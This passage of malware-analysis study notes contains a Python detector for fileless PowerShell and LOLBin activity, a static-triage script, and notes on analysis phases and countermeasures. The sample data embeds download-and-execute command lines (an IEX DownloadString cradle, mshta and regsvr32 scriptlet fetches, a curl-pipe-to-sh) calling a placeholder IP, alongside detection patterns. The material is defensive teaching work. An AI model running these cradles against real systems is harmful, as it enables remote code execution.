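"""Process command-line analysis for fileless / LOLBin activity (added example)."""
import base64
import re

LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "certutil.exe", "bitsadmin.exe", "cscript.exe", "wscript.exe", "msbuild.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# indicator name -> regex (case-insensitive), applied to the command line plus any decoded payload
INDICATORS = {
    "download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer|-urlcache",
    "exec-in-memory": r"invoke-expression|\biex\b|frombase64string|reflection\.assembly|\[system\.io\.memorystream\]",
    "scriptlet": r"scrobj\.dll|\.sct\b|javascript:|vbscript:",
    "stealth-flags": r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b|-noninteractive\b|-ep\s+bypass",
    "url": r"https?://",
}
# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the forms seen in practice
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def encode_ps(script: str) -> str:
    """What the attacker does: Base64 of the UTF-16LE script, for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> dict:
    """Constructed record format: key=value pairs, values containing spaces in double quotes."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def analyse(event: dict) -> list:
    findings = []
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("cmd", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded-command")
        cmd = cmd + " " + decoded                   # scan the decoded script as well
    if image in LOLBINS:
        findings.append("lolbin:" + image)
        if parent in OFFICE:
            findings.append("office-spawned-lolbin")
    for name, pattern in INDICATORS.items():
        if re.search(pattern, cmd, re.IGNORECASE):
            findings.append("indicator:" + name)
    return findings


def scan(lines):
    """Return [(event, findings)] for every record; an empty findings list means clean."""
    results = []
    for line in lines:
        event = parse_event(line)
        results.append((event, analyse(event)))
    return results


def sample_log():
    """Constructed process-creation records, not real Sysmon/4688 output."""
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
    return [
        'image=C:\\Windows\\System32\\notepad.exe parent=explorer.exe cmd="notepad.exe C:\\Users\\bob\\notes.txt"',
        'image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe parent=WINWORD.EXE '
        'cmd="powershell -nop -w hidden -enc ' + encode_ps(stage2) + '"',
        'image=C:\\Windows\\System32\\mshta.exe parent=cmd.exe '
        'cmd="mshta.exe javascript:a=GetObject(\'script:http://198.51.100.7/x.sct\').Exec();close()"',
        'image=C:\\Windows\\System32\\regsvr32.exe parent=cmd.exe '
        'cmd="regsvr32 /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"',
    ]


if __name__ == "__main__":
    for event, findings in scan(sample_log()):
        print(event.get("image", "").rsplit("\\", 1)[-1], "->", findings or "clean")
```

Decoding the encoded command before pattern matching is what makes the difference: on the raw command line the second record only shows a hidden-window PowerShell, while the decoded script exposes the download cradle and the `IEX` in-memory execution.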

Malware analysis

  • Phases:

    • Discovery phase:
      1. Initial Detection: malware discovery may be triggered by antivirus (AV), endpoint detection and response (EDR) systems, or user reports of suspicious activity.
      2. Indicators of Infection:
        • Files with strange behavior (e.g., ransomware locking files).
        • AV or IDS/IPS systems detecting unusual activities like command and control (C2) connections.
        • User complaints such as unexpected system behavior or ransom notes.
      3. Sheep dipping:
        • Scanning removable media and incoming devices for malware on an isolated, dedicated machine before they are allowed onto the production network (the term comes from the farming practice of dipping sheep to remove parasites).
        • The dip machine runs AV and monitoring (e.g., network traffic analysis) to look for suspicious activity.
        • Quarantined devices undergo thorough analysis before being allowed back into the network.
    • Study/Analysis phase:
      1. Static Analysis: this involves analyzing the file without executing it:
        • File hashing: compute MD5/SHA-1/SHA-256 hashes (e.g., md5sum, sha256sum) and look them up in services such as VirusTotal; a single changed byte defeats a hash match, so a miss proves nothing.
        • File type identification: tools like `file` identify the format from magic bytes (e.g., ELF for Linux, PE for Windows).
        • Suspicious strings: searching for human-readable text within the binary (e.g., /bin/sh could indicate that a shell is spawned; URLs and IP addresses point at C2 infrastructure).
        • Obfuscation Detection: malware often obfuscates its code to avoid detection by AV systems.
      2. Dynamic Analysis: involves running the malware to observe its behavior:
        • File System Behavior: what files does it create or modify? Does it delete files or consume system resources (e.g., CPU, memory)?
        • Network Activity: monitoring for any network traffic indicating command and control (C2) communication or data exfiltration.
        • System calls: tools like strace (Linux) or Process Monitor (Windows) trace what the malware asks the operating system for (files, registry keys, network sockets, processes).
  • Tools:

    • VirusTotal: popular service for checking a file or its hash against many antivirus engines.
    • Hybrid Analysis: similar to VirusTotal, adding sandbox reports on file behaviour.
    • strace: tracks system calls during dynamic analysis to see which resources are accessed.
    • IDA Pro/Ghidra: reverse-engineering tools for deeper analysis of the malware code.
  • Important concepts:

    • Obfuscation: malware may use techniques like Base64 encoding or PowerShell obfuscation to avoid detection.
    • Sandboxing: run malware only in an isolated environment (a dedicated physical machine or a virtual machine with no access to production networks) so that it cannot affect real systems.
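As an added example (not from the notes), the Python below scripts the static-analysis steps listed above over a constructed byte string rather than a real sample: hash the file, identify the format from its magic bytes, extract printable strings, flag indicators such as `/bin/sh` or a download command, decode embedded Base64 blobs, and measure Shannon entropy as a hint that a region is packed or encrypted. The sample bytes, the indicator list and the entropy threshold are the example's own choices; in practice the hashes would be submitted to VirusTotal or Hybrid Analysis.

```python
"""Static triage of a binary blob: hashes, type, strings, indicators, entropy (added example)."""
import base64
import hashlib
import math
import re

MAGIC = [(b"\x7fELF", "ELF executable"), (b"MZ", "PE/MZ executable"),
         (b"PK\x03\x04", "ZIP container (.jar/.docx/.apk)"), (b"%PDF", "PDF"), (b"#!", "script with shebang")]
SUSPICIOUS = [b"/bin/sh", b"cmd.exe", b"powershell", b"-EncodedCommand", b"curl ", b"wget ",
              b"VirtualAlloc", b"WriteProcessMemory", b"CreateRemoteThread", b"IsDebuggerPresent"]
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
B64_BLOB = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
HIGH_ENTROPY = 7.2     # bits per byte; compressed or encrypted data sits close to 8.0


def hashes(data: bytes) -> dict:
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}


def file_type(data: bytes) -> str:
    for magic, description in MAGIC:
        if data.startswith(magic):
            return description
    return "unknown"


def strings(data: bytes) -> list:
    """Printable ASCII runs of four or more characters, like the `strings` utility."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(data)]


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for a constant run, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / len(data)) * math.log2(c / len(data)) for c in counts if c)


def decoded_base64_blobs(data: bytes) -> list:
    """Decoded content of Base64 runs that decode to printable text (a hidden stage or command)."""
    out = []
    for m in B64_BLOB.finditer(data):
        try:
            dec = base64.b64decode(m.group(), validate=True)
        except ValueError:
            continue
        if dec and all(0x20 <= c < 0x7F or c in b"\r\n\t" for c in dec):
            out.append(dec)
    return out


def triage(data: bytes) -> dict:
    found = [s.decode() for s in SUSPICIOUS if s in data]
    report = {
        "hashes": hashes(data),
        "type": file_type(data),
        "strings": strings(data),
        "suspicious": found,
        "b64_decoded": decoded_base64_blobs(data),
        "entropy": round(entropy(data), 2),
    }
    report["flags"] = [flag for flag, hit in (("suspicious-strings", found),
                                              ("embedded-base64", report["b64_decoded"]),
                                              ("high-entropy", report["entropy"] >= HIGH_ENTROPY)) if hit]
    return report


def sample_elf() -> bytes:
    """Constructed, non-functional bytes: an ELF magic, a few tell-tale strings, a Base64 blob
    and a uniformly distributed region standing in for a packed or encrypted section."""
    blob = base64.b64encode(b"echo this is a hidden second stage that is quite long")
    return (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
            + b"/bin/sh\x00-c\x00curl http://198.51.100.7/x | sh\x00" + blob + b"\x00"
            + bytes(range(256)) * 4)


if __name__ == "__main__":
    report = triage(sample_elf())
    for key in ("type", "suspicious", "b64_decoded", "entropy", "flags"):
        print(key, report[key])
    print("sha256", report["hashes"]["sha256"])
```

Each check is cheap and each is easy to defeat on its own (a renamed string, a different encoding, a packer), which is why triage combines them and why dynamic analysis follows when the static picture is inconclusive.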

Malware countermeasures

  1. Updates and Patches:
    • Keeping software and systems updated is crucial to defend against malware, as malware often exploits known vulnerabilities.
    • Establish a patch policy with scheduled updates. Neglecting updates increases vulnerability to attacks.
    • Automatic updates can help ensure systems stay secure.
  2. Anti-malware Tools:
    • Use anti-virus, anti-malware, and EDR (Endpoint Detection and Response) solutions to detect and block malicious activity.
    • Windows Security is a built-in tool for virus and threat protection. Ensure real-time protection and regular updates.
  3. User Awareness and Training:
    • Train employees to avoid phishing emails, suspicious links, and unknown attachments. User behavior is a major vector for malware infection.
    • Implement security awareness sessions to help employees identify and handle threats.
  4. Backups:
    • Regular backups are essential to recover from data loss or ransomware attacks.
    • Implement a defined backup schedule, including offsite backups and remote replication.
  5. Logging and Monitoring:
    • Monitor systems using IDS/IPS, file integrity monitors, and network traffic analysis tools (e.g., Wireshark, SolarWinds).
    • Use SIEM systems (e.g., Splunk, AlienVault) to aggregate and analyze logs, enabling quick detection of security incidents.
  6. Blocking Malicious Activity:
    • Block untrusted applications and network connections using whitelisting/blacklisting or firewall rules.
    • Reduce the attack surface: disable unnecessary services and features, and constrain tools that fileless malware abuses (e.g., remove PowerShell v2, restrict PowerShell with Constrained Language Mode and enable script block logging where it is not needed for administration).